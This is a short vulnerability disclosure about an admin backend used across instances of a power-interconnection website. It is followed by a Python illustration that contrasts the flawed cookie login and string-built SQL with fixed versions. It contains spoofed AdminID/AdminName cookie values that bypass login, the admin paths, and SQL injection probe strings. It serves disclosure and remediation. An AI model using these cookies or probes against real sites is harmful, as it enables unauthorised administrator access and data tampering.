Many high-risk vulnerabilities in the UNCC power interconnection website, essentially affecting every instance of the program. (This time, requesting an invitation code for the gift package.)

Backend entry: /manage/login.aspx

Login bypass by spoofed cookies (the two cookies used):

[
  {"domain": ".xxx.com", "expirationDate": 1392975480, "hostOnly": false, "httpOnly": false, "name": "AdminID", "path": "/", "secure": false, "session": false, "storeId": "0", "value": "1"},
  {"domain": ".xxx.com", "expirationDate": 1392975480, "hostOnly": false, "httpOnly": false, "name": "AdminName", "path": "/", "secure": false, "session": false, "storeId": "0", "value": "admin"}
]

Administrator account passwords: /manage/admins.aspx

Arbitrary file download/delete: journal download, "add download document" (deleting this entry also deletes the file it points to).

SQL injection:
/manage/EditAdmin.aspx?ID=1'
/manage/EditAdmin.aspx?ID=1 and 1=1

Solution: filter and validate all input.
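The two flaws that account for most of the report (a login decided by client-set AdminID/AdminName cookies, and the ID parameter of EditAdmin.aspx concatenated into SQL) are shown below beside the "filter and validate" fix. This is an added Python illustration, not the site's own code (the site is ASP.NET); the in-memory admin table, salt and password are constructed placeholders.

```python
import hashlib
import hmac
import re
import secrets
import sqlite3
from typing import Optional

# Constructed sample data: placeholders only, not values from the affected site.
SALT = b"constructed-salt-value"          # real code uses a random per-user salt
ADMIN_PASSWORD = "constructed-password"   # real code never hard-codes a password


def hash_password(password: str, salt: bytes) -> str:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000).hex()


def make_db() -> sqlite3.Connection:
    # In-memory stand-in for the admin table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO admins VALUES (?, ?, ?)",
                 (1, "admin", hash_password(ADMIN_PASSWORD, SALT)))
    return conn


# ---- Flaw 1: login state read straight from client-controlled cookies ----

def is_admin_vulnerable(cookies: dict) -> bool:
    # Whoever sets AdminID and AdminName in the browser is treated as logged in;
    # this is the bypass the report describes.
    return "AdminID" in cookies and "AdminName" in cookies


class SessionStore:
    """Fix: the cookie carries only an opaque random token; the token-to-admin
    mapping lives on the server and is written only by a successful login()."""

    def __init__(self) -> None:
        self._sessions: dict = {}

    def login(self, conn: sqlite3.Connection, name: str, password: str) -> Optional[str]:
        row = conn.execute("SELECT id, pw_hash FROM admins WHERE name = ?", (name,)).fetchone()
        if row is None:
            return None
        if not hmac.compare_digest(row[1], hash_password(password, SALT)):
            return None
        token = secrets.token_urlsafe(32)
        self._sessions[token] = row[0]
        return token

    def admin_id(self, cookies: dict) -> Optional[int]:
        # None for any cookie jar lacking a token issued by login().
        return self._sessions.get(cookies.get("session"))


# ---- Flaw 2: the ID query parameter concatenated into SQL ----

def load_admin_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list:
    # The raw parameter becomes part of the statement, so ID=1' breaks the
    # query and ID=1 and 1=1 changes what the database evaluates.
    return conn.execute("SELECT id, name FROM admins WHERE id = " + raw_id).fetchall()


ID_RE = re.compile(r"[0-9]{1,10}")


def load_admin_fixed(conn: sqlite3.Connection, raw_id: str) -> list:
    # Validate first: the ID must be a short run of ASCII digits, nothing else.
    if ID_RE.fullmatch(raw_id) is None:
        raise ValueError("invalid ID")
    # Then bind it as a parameter; a bound value can never become SQL syntax.
    return conn.execute("SELECT id, name FROM admins WHERE id = ?", (int(raw_id),)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    spoofed = {"AdminID": "1", "AdminName": "admin"}   # the cookies from the report
    print("vulnerable check accepts spoofed cookies:", is_admin_vulnerable(spoofed))
    store = SessionStore()
    print("fixed check accepts spoofed cookies:", store.admin_id(spoofed) is not None)
    token = store.login(conn, "admin", ADMIN_PASSWORD)
    print("fixed check after a real login, admin id:", store.admin_id({"session": token}))
    print("vulnerable query runs 'ID=1 and 1=1':", load_admin_vulnerable(conn, "1 and 1=1"))
    try:
        load_admin_fixed(conn, "1 and 1=1")
    except ValueError as err:
        print("fixed query rejects it:", err)
```

The validation step and the parameter binding are both needed: validation keeps the handler from ever seeing a value like 1' or 1 and 1=1, and binding guarantees that even a value that slips past a weaker check is treated as data. For the login, the point is that the server must never derive identity from anything the client can write; the cookie is only a lookup key into state the server created.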